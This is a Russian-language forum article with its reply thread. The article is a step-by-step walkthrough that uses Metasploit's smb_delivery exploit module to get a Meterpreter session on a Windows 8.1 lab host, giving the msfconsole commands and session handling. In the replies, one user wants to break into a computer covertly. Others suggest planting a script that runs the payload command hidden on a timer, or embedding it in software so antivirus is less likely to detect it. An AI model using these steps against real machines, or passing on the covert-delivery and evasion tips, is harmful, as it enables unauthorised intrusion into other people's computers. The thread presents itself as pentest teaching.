Статья Взлом удаленного хоста (SMB Delivery Exploit)

Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

upload_2016-11-1_22-52-26.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

upload_2016-11-1_22-53-15.png


Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

upload_2016-11-1_22-53-38.png


После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

upload_2016-11-1_22-53-59.png


Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

upload_2016-11-1_22-54-27.png


В диспетчере задач Windows созданный процесс выглядит так:

upload_2016-11-1_22-55-4.png


Снимаем задачу и сессия погибает:

upload_2016-11-1_22-55-21.png


На этом собственно все. Спасибо за внимание.
 
Перезагрузи систему, и попробуй другой порт, 4445 к примеру.
Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
 
Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
 
Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
После двух перезагрузок вот что пишет в скрине... Выделение_010.png
Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
 
Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
Ну я ничего не закрывал...если по умолчанию то да...щас попробую минуя прокси...перезагружусь за пределами экрана дфл
 
Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
После двух перезагрузок вот что пишет в скрине...Посмотреть вложение 7365
Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
 
  • Нравится
Реакции: Dmitry88
Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
Накуя мне скидывать на комп что-то, подходить к нему...цель вообще не прикасаяс ко компу залезть в него
 
В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
лядно всем удачи...как я понял тут разводилово...
ну не может в три секунды сломаться комп...который даже на атаковался...
 
Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
 
Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
Да, обмен опытом - это наш главный приоритет. Отзыв очень исчерпывающий, добавить нечего, все так и есть. Спасибо!
 
  • Нравится
Реакции: aveseth и -=S_U_N_Y=-
В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
лядно всем удачи...как я понял тут разводилово...
ну не может в три секунды сломаться комп...который даже на атаковался...
Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
 
Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
:D
 
Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
Совет самый дешевый товар в мире...тем более у тебя я его и не спрашивал...так что воспользуйстя своим сокровенным знанием заработывать копейки сам...
А так всем кто адекватно ответил благодарен...
kot-gor (у) тебе жму руку...если есть возможность поделиться инфой или какой книгой буду признателен!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!